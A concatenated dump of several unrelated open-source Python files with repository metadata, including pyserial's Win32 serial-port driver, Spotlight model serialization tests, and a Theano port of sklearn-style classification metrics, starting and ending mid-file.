_weibo_is_saved = len(Query(Weibo).equal_to('mid',_weibo.mid).find()) > 0
if not _weibo_is_saved:
# Parse it into a LeanCloud object
weibo = Weibo(mid=_weibo.mid, nickname=_weibo.user_nick_name, timestamp = _weibo.timestamp, topic = _weibo.topic, pics = _weibo.pics)
weibo.save()
new_mid_list.append(_weibo.mid)
return u'Topic #%s# gained %s new weibos: %s' % (_weibo.topic, len(new_mid_list), ",".join(new_mid_list))
"""
todo = Todo(content=content)
todo.save()
return redirect(url_for('todos.show'))
"""
|
zhangw/leancloud_apperance_app
|
views/weibos.py
|
Python
|
mit
| 1,920
|
from selenium.webdriver.support.select import Select
def get_selected_option(browser, css_selector):
# Takes a css selector for a <select> element and returns the value of
# the selected option
select = Select(browser.find_element_by_css_selector(css_selector))
return select.first_selected_option.get_attribute('value')
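# Illustrative usage (the selector is an assumption):
#   country = get_selected_option(browser, 'select#country')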
|
egineering-llc/egat_example_project
|
tests/test_helpers/selenium_helper.py
|
Python
|
mit
| 338
|
#! python
# Python Serial Port Extension for Win32, Linux, BSD, Jython
# serial driver for win32
# see __init__.py
#
# (C) 2001-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
#
# Initial patch to use ctypes by Giovanni Bajo <rasky@develer.com>
import ctypes
import time
from serial import win32
import serial
from serial.serialutil import SerialBase, SerialException, to_bytes, portNotOpenError, writeTimeoutError
class Serial(SerialBase):
"""Serial port implementation for Win32 based on ctypes."""
BAUDRATES = (50, 75, 110, 134, 150, 200, 300, 600, 1200, 1800, 2400, 4800,
9600, 19200, 38400, 57600, 115200)
def __init__(self, *args, **kwargs):
super(SerialBase, self).__init__()
self._port_handle = None
self._overlapped_read = None
self._overlapped_write = None
SerialBase.__init__(self, *args, **kwargs)
def open(self):
"""\
Open port with current settings. This may throw a SerialException
if the port cannot be opened.
"""
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
if self.is_open:
raise SerialException("Port is already open.")
# the "\\.\COMx" format is required for devices other than COM1-COM8
# not all versions of windows seem to support this properly
# so that the first few ports are used with the DOS device name
port = self.name
try:
if port.upper().startswith('COM') and int(port[3:]) > 8:
port = '\\\\.\\' + port
except ValueError:
# for names like 'COMnotanumber'
pass
self._port_handle = win32.CreateFile(
port,
win32.GENERIC_READ | win32.GENERIC_WRITE,
0, # exclusive access
None, # no security
win32.OPEN_EXISTING,
win32.FILE_ATTRIBUTE_NORMAL | win32.FILE_FLAG_OVERLAPPED,
0)
if self._port_handle == win32.INVALID_HANDLE_VALUE:
self._port_handle = None # 'cause __del__ is called anyway
raise SerialException("could not open port %r: %r" % (self.portstr, ctypes.WinError()))
try:
self._overlapped_read = win32.OVERLAPPED()
self._overlapped_read.hEvent = win32.CreateEvent(None, 1, 0, None)
self._overlapped_write = win32.OVERLAPPED()
#~ self._overlapped_write.hEvent = win32.CreateEvent(None, 1, 0, None)
self._overlapped_write.hEvent = win32.CreateEvent(None, 0, 0, None)
# Setup a 4k buffer
win32.SetupComm(self._port_handle, 4096, 4096)
# Save original timeout values:
self._orgTimeouts = win32.COMMTIMEOUTS()
win32.GetCommTimeouts(self._port_handle, ctypes.byref(self._orgTimeouts))
self._reconfigure_port()
# Clear buffers:
# Remove anything that was there
win32.PurgeComm(
self._port_handle,
win32.PURGE_TXCLEAR | win32.PURGE_TXABORT |
win32.PURGE_RXCLEAR | win32.PURGE_RXABORT)
except:
try:
self._close()
except:
# ignore any exception when closing the port
# also to keep original exception that happened when setting up
pass
self._port_handle = None
raise
else:
self.is_open = True
def _reconfigure_port(self):
"""Set communication parameters on opened port."""
if not self._port_handle:
raise SerialException("Can only operate on a valid port handle")
# Set Windows timeout values
# timeouts is a tuple with the following items:
# (ReadIntervalTimeout,ReadTotalTimeoutMultiplier,
# ReadTotalTimeoutConstant,WriteTotalTimeoutMultiplier,
# WriteTotalTimeoutConstant)
timeouts = win32.COMMTIMEOUTS()
if self._timeout is None:
pass # default of all zeros is OK
elif self._timeout == 0:
timeouts.ReadIntervalTimeout = win32.MAXDWORD
else:
timeouts.ReadTotalTimeoutConstant = max(int(self._timeout * 1000), 1)
if self._timeout != 0 and self._inter_byte_timeout is not None:
timeouts.ReadIntervalTimeout = max(int(self._inter_byte_timeout * 1000), 1)
if self._write_timeout is None:
pass
elif self._write_timeout == 0:
timeouts.WriteTotalTimeoutConstant = win32.MAXDWORD
else:
timeouts.WriteTotalTimeoutConstant = max(int(self._write_timeout * 1000), 1)
win32.SetCommTimeouts(self._port_handle, ctypes.byref(timeouts))
win32.SetCommMask(self._port_handle, win32.EV_ERR)
# Setup the connection info.
# Get state and modify it:
comDCB = win32.DCB()
win32.GetCommState(self._port_handle, ctypes.byref(comDCB))
comDCB.BaudRate = self._baudrate
if self._bytesize == serial.FIVEBITS:
comDCB.ByteSize = 5
elif self._bytesize == serial.SIXBITS:
comDCB.ByteSize = 6
elif self._bytesize == serial.SEVENBITS:
comDCB.ByteSize = 7
elif self._bytesize == serial.EIGHTBITS:
comDCB.ByteSize = 8
else:
raise ValueError("Unsupported number of data bits: %r" % self._bytesize)
if self._parity == serial.PARITY_NONE:
comDCB.Parity = win32.NOPARITY
comDCB.fParity = 0 # Disable Parity Check
elif self._parity == serial.PARITY_EVEN:
comDCB.Parity = win32.EVENPARITY
comDCB.fParity = 1 # Enable Parity Check
elif self._parity == serial.PARITY_ODD:
comDCB.Parity = win32.ODDPARITY
comDCB.fParity = 1 # Enable Parity Check
elif self._parity == serial.PARITY_MARK:
comDCB.Parity = win32.MARKPARITY
comDCB.fParity = 1 # Enable Parity Check
elif self._parity == serial.PARITY_SPACE:
comDCB.Parity = win32.SPACEPARITY
comDCB.fParity = 1 # Enable Parity Check
else:
raise ValueError("Unsupported parity mode: %r" % self._parity)
if self._stopbits == serial.STOPBITS_ONE:
comDCB.StopBits = win32.ONESTOPBIT
elif self._stopbits == serial.STOPBITS_ONE_POINT_FIVE:
comDCB.StopBits = win32.ONE5STOPBITS
elif self._stopbits == serial.STOPBITS_TWO:
comDCB.StopBits = win32.TWOSTOPBITS
else:
raise ValueError("Unsupported number of stop bits: %r" % self._stopbits)
comDCB.fBinary = 1 # Enable Binary Transmission
# Char. w/ Parity-Err are replaced with 0xff (if fErrorChar is set to TRUE)
if self._rs485_mode is None:
if self._rtscts:
comDCB.fRtsControl = win32.RTS_CONTROL_HANDSHAKE
else:
comDCB.fRtsControl = win32.RTS_CONTROL_ENABLE if self._rts_state else win32.RTS_CONTROL_DISABLE
comDCB.fOutxCtsFlow = self._rtscts
else:
# checks for unsupported settings
# XXX verify if platform really does not have a setting for those
if not self._rs485_mode.rts_level_for_tx:
raise ValueError(
'Unsupported value for RS485Settings.rts_level_for_tx: %r' % (
self._rs485_mode.rts_level_for_tx,))
if self._rs485_mode.rts_level_for_rx:
raise ValueError(
'Unsupported value for RS485Settings.rts_level_for_rx: %r' % (
self._rs485_mode.rts_level_for_rx,))
if self._rs485_mode.delay_before_tx is not None:
raise ValueError(
'Unsupported value for RS485Settings.delay_before_tx: %r' % (
self._rs485_mode.delay_before_tx,))
if self._rs485_mode.delay_before_rx is not None:
raise ValueError(
'Unsupported value for RS485Settings.delay_before_rx: %r' % (
self._rs485_mode.delay_before_rx,))
if self._rs485_mode.loopback:
raise ValueError(
'Unsupported value for RS485Settings.loopback: %r' % (
self._rs485_mode.loopback,))
comDCB.fRtsControl = win32.RTS_CONTROL_TOGGLE
comDCB.fOutxCtsFlow = 0
if self._dsrdtr:
comDCB.fDtrControl = win32.DTR_CONTROL_HANDSHAKE
else:
comDCB.fDtrControl = win32.DTR_CONTROL_ENABLE if self._dtr_state else win32.DTR_CONTROL_DISABLE
comDCB.fOutxDsrFlow = self._dsrdtr
comDCB.fOutX = self._xonxoff
comDCB.fInX = self._xonxoff
comDCB.fNull = 0
comDCB.fErrorChar = 0
comDCB.fAbortOnError = 0
comDCB.XonChar = serial.XON
comDCB.XoffChar = serial.XOFF
if not win32.SetCommState(self._port_handle, ctypes.byref(comDCB)):
raise ValueError("Cannot configure port, some setting was wrong. Original message: %r" % ctypes.WinError())
#~ def __del__(self):
#~ self.close()
def _close(self):
"""internal close port helper"""
if self._port_handle:
# Restore original timeout values:
win32.SetCommTimeouts(self._port_handle, self._orgTimeouts)
# Close COM-Port:
win32.CloseHandle(self._port_handle)
if self._overlapped_read is not None:
win32.CloseHandle(self._overlapped_read.hEvent)
self._overlapped_read = None
if self._overlapped_write is not None:
win32.CloseHandle(self._overlapped_write.hEvent)
self._overlapped_write = None
self._port_handle = None
def close(self):
"""Close port"""
if self.is_open:
self._close()
self.is_open = False
# - - - - - - - - - - - - - - - - - - - - - - - -
@property
def in_waiting(self):
"""Return the number of bytes currently in the input buffer."""
flags = win32.DWORD()
comstat = win32.COMSTAT()
if not win32.ClearCommError(self._port_handle, ctypes.byref(flags), ctypes.byref(comstat)):
raise SerialException('call to ClearCommError failed')
return comstat.cbInQue
def read(self, size=1):
"""\
Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read."""
if not self._port_handle:
raise portNotOpenError
if size > 0:
win32.ResetEvent(self._overlapped_read.hEvent)
flags = win32.DWORD()
comstat = win32.COMSTAT()
if not win32.ClearCommError(self._port_handle, ctypes.byref(flags), ctypes.byref(comstat)):
raise SerialException('call to ClearCommError failed')
if self.timeout == 0:
n = min(comstat.cbInQue, size)
if n > 0:
buf = ctypes.create_string_buffer(n)
rc = win32.DWORD()
read_ok = win32.ReadFile(self._port_handle, buf, n, ctypes.byref(rc), ctypes.byref(self._overlapped_read))
if not read_ok and win32.GetLastError() not in (win32.ERROR_SUCCESS, win32.ERROR_IO_PENDING):
raise SerialException("ReadFile failed (%r)" % ctypes.WinError())
win32.WaitForSingleObject(self._overlapped_read.hEvent, win32.INFINITE)
read = buf.raw[:rc.value]
else:
read = bytes()
else:
buf = ctypes.create_string_buffer(size)
rc = win32.DWORD()
read_ok = win32.ReadFile(self._port_handle, buf, size, ctypes.byref(rc), ctypes.byref(self._overlapped_read))
if not read_ok and win32.GetLastError() not in (win32.ERROR_SUCCESS, win32.ERROR_IO_PENDING):
raise SerialException("ReadFile failed (%r)" % ctypes.WinError())
win32.GetOverlappedResult(self._port_handle, ctypes.byref(self._overlapped_read), ctypes.byref(rc), True)
read = buf.raw[:rc.value]
else:
read = bytes()
return bytes(read)
def write(self, data):
"""Output the given byte string over the serial port."""
if not self._port_handle:
raise portNotOpenError
#~ if not isinstance(data, (bytes, bytearray)):
#~ raise TypeError('expected %s or bytearray, got %s' % (bytes, type(data)))
# convert data (needed in case of memoryview instance: Py 3.1 io lib), ctypes doesn't like memoryview
data = to_bytes(data)
if data:
#~ win32event.ResetEvent(self._overlapped_write.hEvent)
n = win32.DWORD()
err = win32.WriteFile(self._port_handle, data, len(data), ctypes.byref(n), self._overlapped_write)
if not err and win32.GetLastError() != win32.ERROR_IO_PENDING:
raise SerialException("WriteFile failed (%r)" % ctypes.WinError())
if self._write_timeout != 0: # if blocking (None) or w/ write timeout (>0)
# Wait for the write to complete.
#~ win32.WaitForSingleObject(self._overlapped_write.hEvent, win32.INFINITE)
err = win32.GetOverlappedResult(self._port_handle, self._overlapped_write, ctypes.byref(n), True)
if n.value != len(data):
raise writeTimeoutError
return n.value
else:
return 0
def flush(self):
"""\
Flush of file like objects. In this case, wait until all data
is written.
"""
while self.out_waiting:
time.sleep(0.05)
# XXX could also use WaitCommEvent with mask EV_TXEMPTY, but it would
        # require overlapped IO and it's also only possible to set a single mask
        # on the port.
def reset_input_buffer(self):
"""Clear input buffer, discarding all that is in the buffer."""
if not self._port_handle:
raise portNotOpenError
win32.PurgeComm(self._port_handle, win32.PURGE_RXCLEAR | win32.PURGE_RXABORT)
def reset_output_buffer(self):
"""\
Clear output buffer, aborting the current output and discarding all
that is in the buffer.
"""
if not self._port_handle:
raise portNotOpenError
win32.PurgeComm(self._port_handle, win32.PURGE_TXCLEAR | win32.PURGE_TXABORT)
def _update_break_state(self):
"""Set break: Controls TXD. When active, to transmitting is possible."""
if not self._port_handle:
raise portNotOpenError
if self._break_state:
win32.SetCommBreak(self._port_handle)
else:
win32.ClearCommBreak(self._port_handle)
def _update_rts_state(self):
"""Set terminal status line: Request To Send"""
if self._rts_state:
win32.EscapeCommFunction(self._port_handle, win32.SETRTS)
else:
win32.EscapeCommFunction(self._port_handle, win32.CLRRTS)
def _update_dtr_state(self):
"""Set terminal status line: Data Terminal Ready"""
if self._dtr_state:
win32.EscapeCommFunction(self._port_handle, win32.SETDTR)
else:
win32.EscapeCommFunction(self._port_handle, win32.CLRDTR)
def _GetCommModemStatus(self):
if not self._port_handle:
raise portNotOpenError
stat = win32.DWORD()
win32.GetCommModemStatus(self._port_handle, ctypes.byref(stat))
return stat.value
@property
def cts(self):
"""Read terminal status line: Clear To Send"""
return win32.MS_CTS_ON & self._GetCommModemStatus() != 0
@property
def dsr(self):
"""Read terminal status line: Data Set Ready"""
return win32.MS_DSR_ON & self._GetCommModemStatus() != 0
@property
def ri(self):
"""Read terminal status line: Ring Indicator"""
return win32.MS_RING_ON & self._GetCommModemStatus() != 0
@property
def cd(self):
"""Read terminal status line: Carrier Detect"""
return win32.MS_RLSD_ON & self._GetCommModemStatus() != 0
# - - platform specific - - - -
def set_buffer_size(self, rx_size=4096, tx_size=None):
"""\
Recommend a buffer size to the driver (device driver can ignore this
        value). Must be called before the port is opened.
"""
if tx_size is None:
tx_size = rx_size
win32.SetupComm(self._port_handle, rx_size, tx_size)
def set_output_flow_control(self, enable=True):
"""\
Manually control flow - when software flow control is enabled.
This will do the same as if XON (true) or XOFF (false) are received
from the other device and control the transmission accordingly.
WARNING: this function is not portable to different platforms!
"""
if not self._port_handle:
raise portNotOpenError
if enable:
win32.EscapeCommFunction(self._port_handle, win32.SETXON)
else:
win32.EscapeCommFunction(self._port_handle, win32.SETXOFF)
@property
def out_waiting(self):
"""Return how many bytes the in the outgoing buffer"""
flags = win32.DWORD()
comstat = win32.COMSTAT()
if not win32.ClearCommError(self._port_handle, ctypes.byref(flags), ctypes.byref(comstat)):
raise SerialException('call to ClearCommError failed')
return comstat.cbOutQue
# Test function only!!
if __name__ == '__main__':
import sys
s = Serial(0)
sys.stdout.write("%s\n" % s)
s = Serial()
sys.stdout.write("%s\n" % s)
s.baudrate = 19200
s.databits = 7
s.close()
s.port = 0
s.open()
sys.stdout.write("%s\n" % s)
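    # Hedged usage sketch (port name and settings are illustrative; requires
    # a real device):
    #   s = Serial('COM3', baudrate=115200, timeout=1)
    #   s.write(b'ping')
    #   response = s.read(4)
    #   s.close()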
|
martinohanlon/microbit-micropython
|
examples/mcfly/serial/serialwin32.py
|
Python
|
mit
| 18,300
|
# -*- coding: utf-8 -*-
from IPython.core.display import Javascript, HTML, display_javascript, display_html
def setup_notebook():
# assign text/x-c++src MIME type to pybind11 cells
code = """
require(['notebook/js/codecell'], function(cc) {
cc.CodeCell.options_default.highlight_modes['magic_text/x-c++src'] =
{reg: [/^\s*%%pybind11/]};
});
"""
display_javascript(Javascript(data=code))
# assign non-black colour to C/C++ keywords
html = """
<style>
.cm-s-ipython span.cm-variable-3 {
color: #208ffb;
font-weight: bold;
}
</style>
"""
display_html(HTML(data=html))
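# Hedged usage sketch (import path assumed from this file's location):
#   from ipybind.notebook import setup_notebook
#   setup_notebook()  # run once per notebook session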
|
aldanor/ipybind
|
ipybind/notebook.py
|
Python
|
mit
| 661
|
import os
import shutil
import tempfile
import numpy as np
import pytest
import torch
from spotlight.cross_validation import random_train_test_split
from spotlight.datasets import movielens
from spotlight.evaluation import mrr_score, sequence_mrr_score
from spotlight.evaluation import rmse_score
from spotlight.factorization.explicit import ExplicitFactorizationModel
from spotlight.factorization.implicit import ImplicitFactorizationModel
from spotlight.sequence.implicit import ImplicitSequenceModel
from spotlight.sequence.representations import CNNNet
RANDOM_STATE = np.random.RandomState(42)
CUDA = bool(os.environ.get('SPOTLIGHT_CUDA', False))
def _reload(model):
dirname = tempfile.mkdtemp()
try:
fname = os.path.join(dirname, "model.pkl")
torch.save(model, fname)
model = torch.load(fname)
finally:
shutil.rmtree(dirname)
return model
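# Note: _reload round-trips a fitted model through torch.save/torch.load in
# a temporary directory, so the tests below assert that serialization
# preserves evaluation scores exactly.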
@pytest.fixture(scope="module")
def data():
interactions = movielens.get_movielens_dataset('100K')
train, test = random_train_test_split(interactions,
random_state=RANDOM_STATE)
return train, test
def test_explicit_serialization(data):
train, test = data
model = ExplicitFactorizationModel(loss='regression',
n_iter=3,
batch_size=1024,
learning_rate=1e-3,
l2=1e-5,
use_cuda=CUDA)
model.fit(train)
rmse_original = rmse_score(model, test)
rmse_recovered = rmse_score(_reload(model), test)
assert rmse_original == rmse_recovered
def test_implicit_serialization(data):
train, test = data
model = ImplicitFactorizationModel(loss='bpr',
n_iter=3,
batch_size=1024,
learning_rate=1e-2,
l2=1e-6,
use_cuda=CUDA)
model.fit(train)
mrr_original = mrr_score(model, test, train=train).mean()
mrr_recovered = mrr_score(_reload(model), test, train=train).mean()
assert mrr_original == mrr_recovered
def test_implicit_sequence_serialization(data):
train, test = data
train = train.to_sequence(max_sequence_length=128)
test = test.to_sequence(max_sequence_length=128)
model = ImplicitSequenceModel(loss='bpr',
representation=CNNNet(train.num_items,
embedding_dim=32,
kernel_width=3,
dilation=(1, ),
num_layers=1),
batch_size=128,
learning_rate=1e-1,
l2=0.0,
n_iter=5,
random_state=RANDOM_STATE,
use_cuda=CUDA)
model.fit(train)
mrr_original = sequence_mrr_score(model, test).mean()
mrr_recovered = sequence_mrr_score(_reload(model), test).mean()
assert mrr_original == mrr_recovered
|
maciejkula/spotlight
|
tests/test_serialization.py
|
Python
|
mit
| 3,374
|
import theano, theano.tensor as T
import numpy as np
import pandas as pd
import lasagne
"""
note: we are following the sklearn api for metrics/loss functions,
where the first arg for a function is y true, and second value is
y predicted. this is the opposite of the theano functions, so just
keep in mind.
"""
#copy existing code and place in tmetrics namespace
multiclass_hinge_loss = lambda yt, yp: lasagne.objectives.multiclass_hinge_loss(yp, yt)
squared_error = lambda yt, yp: lasagne.objectives.squared_error(yp, yt)
binary_accuracy = lambda yt, yp: lasagne.objectives.binary_accuracy(yp, yt)
categorical_accuracy = lambda yt, yp: lasagne.objectives.categorical_accuracy(yp, yt)
def binary_crossentropy(y_true, y_predicted):
"""
wrapper of theano.tensor.nnet.binary_crossentropy
args reversed to match tmetrics api
"""
return T.nnet.binary_crossentropy(y_predicted, y_true)
def categorical_crossentropy(y_true, y_predicted):
"""
wrapper of theano.tensor.nnet.categorical_crossentropy
args reversed to match tmetrics api
"""
    return T.nnet.categorical_crossentropy(y_predicted, y_true)
def binary_hinge_loss(y_true, y_predicted, binary=True, delta=1):
"""
wrapper of lasagne.objectives.binary_hinge_loss
args reversed to match tmetrics api
"""
return lasagne.objectives.binary_hinge_loss(y_predicted, y_true, binary, delta)
def brier_score_loss(y_true, y_predicted, sample_weight=None):
"""
port of sklearn.metrics.brier_score_loss
works for 2D binary data as well, e.g.
y_true: [[0, 1, 0],
[1, 0, 0]]
y_predicted: [[.1, .9, .3],
[.4, .7, .2]]
y_true: tensor, y true (binary)
y_predicted: tensor, y predicted (float between 0 and 1)
sample_weight: tensor or None (standard mean)
assumptions:
-binary ground truth values ({0, 1}); no pos_label
training wheels like sklearn or figuring out how to
run this on text labels.
-probabilities are floats between 0-1
-sample_weight broadcasts to ((y_true - y_predicted) ** 2)
"""
scores = ((y_true - y_predicted) ** 2)
if sample_weight is not None:
scores = scores * sample_weight
return scores.mean()
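# Hedged usage sketch: brier_score_loss builds a symbolic graph, so it is
# compiled with theano.function before use (variable names are illustrative):
#   yt, yp = T.vector('yt'), T.vector('yp')
#   brier = theano.function([yt, yp], brier_score_loss(yt, yp))
#   brier([0., 1., 1.], [.1, .9, .8])  # -> ~0.02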
def hamming_loss(y_true, y_predicted):
"""
note - works on n-dim arrays, means across the final axis
note - we round predicted because float probabilities would not work
"""
return T.neq(y_true, T.round(y_predicted)).astype(theano.config.floatX).mean(axis=-1)
def jaccard_similarity(y_true, y_predicted):
"""
y_true: tensor ({1, 0})
y_predicted: tensor ({1, 0})
note - we round predicted because float probabilities would not work
"""
y_predicted = T.round(y_predicted).astype(theano.config.floatX)
either_nonzero = T.or_(T.neq(y_true, 0), T.neq(y_predicted, 0))
return T.and_(T.neq(y_true, y_predicted), either_nonzero).sum(axis=-1, dtype=theano.config.floatX) / either_nonzero.sum(axis=-1, dtype=theano.config.floatX)
def _nbool_correspond_all(u, v):
"""
port of scipy.spatial.distance._nbool_correspond_all
with dtype assumed to be integer/float (no bool in theano)
sums are on last axis
"""
not_u = 1.0 - u
not_v = 1.0 - v
nff = (not_u * not_v).sum(axis=-1, dtype=theano.config.floatX)
nft = (not_u * v).sum(axis=-1, dtype=theano.config.floatX)
ntf = (u * not_v).sum(axis=-1, dtype=theano.config.floatX)
ntt = (u * v).sum(axis=-1, dtype=theano.config.floatX)
return (nff, nft, ntf, ntt)
def kulsinski_similarity(y_true, y_predicted):
y_predicted = T.round(y_predicted)
nff, nft, ntf, ntt = _nbool_correspond_all(y_true, y_predicted)
n = y_true.shape[0].astype('float32')
return (ntf + nft - ntt + n) / (ntf + nft + n)
def trapz(y, x=None, dx=1.0, axis=-1):
"""
reference implementation: numpy.trapz
---------
Integrate along the given axis using the composite trapezoidal rule.
Integrate `y` (`x`) along given axis.
Parameters
----------
y : array_like
Input array to integrate.
x : array_like, optional
If `x` is None, then spacing between all `y` elements is `dx`.
dx : scalar, optional
If `x` is None, spacing given by `dx` is assumed. Default is 1.
axis : int, optional
Specify the axis.
Returns
-------
trapz : float
Definite integral as approximated by trapezoidal rule.
See Also
--------
sum, cumsum
Notes
-----
Image [2]_ illustrates trapezoidal rule -- y-axis locations of points
will be taken from `y` array, by default x-axis distances between
points will be 1.0, alternatively they can be provided with `x` array
or with `dx` scalar. Return value will be equal to combined area under
the red lines.
References
----------
.. [1] Wikipedia page: http://en.wikipedia.org/wiki/Trapezoidal_rule
.. [2] Illustration image:
http://en.wikipedia.org/wiki/File:Composite_trapezoidal_rule_illustration.png
Examples
--------
>>> np.trapz([1,2,3])
4.0
>>> np.trapz([1,2,3], x=[4,6,8])
8.0
>>> np.trapz([1,2,3], dx=2)
8.0
>>> a = np.arange(6).reshape(2, 3)
>>> a
array([[0, 1, 2],
[3, 4, 5]])
>>> np.trapz(a, axis=0)
array([ 1.5, 2.5, 3.5])
>>> np.trapz(a, axis=1)
array([ 2., 8.])
"""
if x is None:
d = dx
else:
if x.ndim == 1:
d = T.extra_ops.diff(x)
# reshape to correct shape
shape = T.ones(y.ndim, dtype='int8')
shape = T.set_subtensor(shape[axis], d.shape[0])
d = d.reshape(shape)
else:
d = T.extra_ops.diff(x, axis=axis)
nd = y.ndim
slice1 = [slice(None)]*nd
slice2 = [slice(None)]*nd
slice1[axis] = slice(1, None)
slice2[axis] = slice(None, -1)
return (d * (y[slice1] + y[slice2]) / 2.0).sum(axis)
def auc(x, y):
return abs(trapz(y, x))
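# Hedged usage sketch: auc integrates y over x with the trapezoidal rule
# (inputs are illustrative):
#   x, y = T.vector('x'), T.vector('y')
#   area = theano.function([x, y], auc(x, y))
#   area([0., .5, 1.], [0., .8, 1.])  # -> ~0.65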
#def roc_curve(y_true, y_predicted):
# fps, tps, thresholds = _binary_clf_curve(y_true, y_predicted)
# fpr = fps.astype('float32') / fps[-1]
# tpr = tps.astype('float32') / tps[-1]
# return fpr, tpr, thresholds
#
#def roc_auc_score(y_true, y_predicted):
# fpr, tpr, thresholds = roc_curve(y_true, y_predicted)
# return auc(fpr, tpr)
def _last_axis_binary_clf_curve(y_true, y_predicted):
"""
returns y_predicted.shape[-2] binary clf curves calculated axis[-1]-wise
this is a numpy implementation
"""
assert y_true.shape == y_predicted.shape
axis = -1
sort_idx = list(np.ogrid[[slice(x) for x in y_predicted.shape]])
sort_idx[axis] = y_predicted.argsort(axis=axis).astype('int8')
reverse = [slice(None)] * y_predicted.ndim
reverse[axis] = slice(None, None, -1)
sorted_y_predicted = y_predicted[sort_idx][reverse]
sorted_y_true = y_true[sort_idx][reverse]
tps = sorted_y_true.cumsum(axis=axis)
count = (np.ones(y_predicted.shape) * np.arange(y_predicted.shape[-1]))
fps = 1 + count - tps
threshold_values = sorted_y_predicted
return fps, tps, threshold_values
def last_axis_roc_curve(y_true, y_predicted):
"numpy implementation"
fps, tps, thresholds = _last_axis_binary_clf_curve(y_true, y_predicted)
i = [slice(None)] * fps.ndim
i[-1] = -1
fpr = fps.astype('float32') / np.expand_dims(fps[i], axis=-1)
tpr = tps.astype('float32') / np.expand_dims(tps[i], axis=-1)
#tpr = tps.astype('float32') / tps[i][:, np.newaxis]
return fpr, tpr, thresholds
def last_axis_roc_auc_scores(y_true, y_predicted):
fpr, tpr, _ = last_axis_roc_curve(y_true, y_predicted)
return np.trapz(tpr, fpr)
def _vector_clf_curve(y_true, y_predicted):
"""
sklearn.metrics._binary_clf_curve port
y_true: tensor (vector): y true
y_predicted: tensor (vector): y predicted
returns: fps, tps, threshold_values
fps: tensor (vector): false positivies
tps: tensor (vector): true positives
threshold_values: tensor (vector): value of y predicted at each threshold
along the curve
restrictions:
-not numpy compatible
-only works with two vectors (not matrix or tensor)
"""
assert y_true.ndim == y_predicted.ndim == 1
desc_score_indices = y_predicted.argsort()[::-1].astype('int8')
sorted_y_predicted = y_predicted[desc_score_indices]
sorted_y_true = y_true[desc_score_indices]
distinct_value_indices = (1-T.isclose(T.extra_ops.diff(sorted_y_predicted), 0)).nonzero()[0]
curve_cap = T.extra_ops.repeat(sorted_y_predicted.size - 1, 1)
threshold_indices = T.concatenate([distinct_value_indices, curve_cap]).astype('int8')
tps = T.extra_ops.cumsum(sorted_y_true[threshold_indices])
fps = 1 + threshold_indices - tps
threshold_values = sorted_y_predicted[threshold_indices]
return fps, tps, threshold_values
def _matrix_clf_curve(y_true, y_predicted):
assert y_true.ndim == y_predicted.ndim == 2
row_i = T.arange(y_true.shape[0], dtype='int8').dimshuffle(0, 'x')
col_i = y_predicted.argsort().astype('int8')
reverse = [slice(None), slice(None, None, -1)]
y_true = y_true[row_i, col_i][reverse]
y_predicted = y_predicted[row_i, col_i][reverse]
tps = y_true.cumsum(axis=-1)
counts = T.ones_like(y_true) * T.arange(y_predicted.shape[-1], dtype='int8')
fps = 1 + counts - tps
return fps, tps, y_predicted
def _tensor3_clf_curve(y_true, y_predicted):
assert y_true.ndim == y_predicted.ndim == 3
x_i = T.arange(y_true.shape[0], dtype='int8').dimshuffle(0, 'x', 'x')
y_i = T.arange(y_true.shape[1], dtype='int8').dimshuffle('x', 0, 'x')
z_i = y_predicted.argsort().astype('int8')
reverse = [slice(None), slice(None), slice(None, None, -1)]
y_true = y_true[x_i, y_i, z_i][reverse]
y_predicted = y_predicted[x_i, y_i, z_i][reverse]
tps = y_true.cumsum(axis=-1)
counts = T.ones_like(y_true) * T.arange(y_predicted.shape[-1], dtype='int8')
fps = 1 + counts - tps
return fps, tps, y_predicted
def _tensor4_clf_curve(y_true, y_predicted):
assert y_true.ndim == y_predicted.ndim == 4
a_i = T.arange(y_true.shape[0], dtype='int8').dimshuffle(0, 'x', 'x', 'x')
b_i = T.arange(y_true.shape[1], dtype='int8').dimshuffle('x', 0, 'x', 'x')
c_i = T.arange(y_true.shape[2], dtype='int8').dimshuffle('x', 'x', 0, 'x')
d_i = y_predicted.argsort().astype('int8')
reverse = [slice(None), slice(None), slice(None), slice(None, None, -1)]
y_true = y_true[a_i, b_i, c_i, d_i][reverse]
y_predicted = y_predicted[a_i, b_i, c_i, d_i][reverse]
tps = y_true.cumsum(axis=-1)
counts = T.ones_like(y_true) * T.arange(y_predicted.shape[-1], dtype='int8')
fps = 1 + counts - tps
return fps, tps, y_predicted
def _binary_clf_curves(y_true, y_predicted):
"""
returns curves calculated axis[-1]-wise
note - despite trying several approaches, could not seem to get a
n-dimensional verision of clf_curve to work, so abandoning. 2,3,4 is fine.
"""
if not (y_true.ndim == y_predicted.ndim):
raise ValueError('Dimension mismatch, ({}, {})'.format(y_true.ndim, y_predicted.ndim))
if not isinstance(y_true, T.TensorVariable) or not isinstance(y_predicted, T.TensorVariable):
raise TypeError('This only works for symbolic variables.')
if y_true.ndim == 1:
clf_curve_fn = _vector_clf_curve
elif y_true.ndim == 2:
clf_curve_fn = _matrix_clf_curve
elif y_true.ndim == 3:
clf_curve_fn = _tensor3_clf_curve
elif y_true.ndim == 4:
clf_curve_fn = _tensor4_clf_curve
else:
raise NotImplementedError('Not implemented for ndim {}'.format(y_true.ndim))
fps, tps, thresholds = clf_curve_fn(y_true, y_predicted)
return fps, tps, thresholds
def _last_col_idx(ndim):
    last_col = [slice(None) for x in range(ndim)]
last_col[-1] = -1
return last_col
def _reverse_idx(ndim):
reverse = [slice(None) for _ in range(ndim-1)]
reverse.append(slice(None, None, -1))
return reverse
def roc_curves(y_true, y_predicted):
"returns roc curves calculated axis -1-wise"
fps, tps, thresholds = _binary_clf_curves(y_true, y_predicted)
last_col = _last_col_idx(y_true.ndim)
fpr = fps.astype('float32') / T.shape_padright(fps[last_col], 1)
tpr = tps.astype('float32') / T.shape_padright(tps[last_col], 1)
return fpr, tpr, thresholds
def roc_auc_scores(y_true, y_predicted):
"roc auc scores calculated axis -1-wise"
fpr, tpr, thresholds = roc_curves(y_true, y_predicted)
return auc(fpr, tpr)
def roc_auc_loss(y_true, y_predicted):
return 1-roc_auc_scores(y_true, y_predicted)
def precision_recall_curves(y_true, y_predicted):
"precision recall curves calculated axis -1-wise"
fps, tps, thresholds = _binary_clf_curves(y_true, y_predicted)
last_col = _last_col_idx(y_true.ndim)
last_col[-1] = np.asarray([-1], dtype='int8')
